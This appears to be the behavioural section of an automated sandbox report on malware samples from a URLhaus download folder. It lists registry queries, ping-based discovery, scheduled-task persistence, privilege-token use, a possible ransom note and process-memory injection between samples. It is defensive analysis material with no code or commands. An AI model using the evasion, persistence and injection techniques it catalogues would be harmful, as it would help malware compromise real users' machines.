Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5} C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024" C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = d20de67af3c8613f60eb5e1827463522feaf35eeeeef2f258ba3d2055017810f076911ebb8d1afea1c84c804050f931dee18e328257912f1081cf2c7f12d401526cd10c6cf962825921bdf C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772324680587466" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr = 537d567366087c6658524c17525304175142701eb36b C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
N/A N/A C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3948 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 3948 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 3912 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3912 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3912 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3912 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 3912 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 3912 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
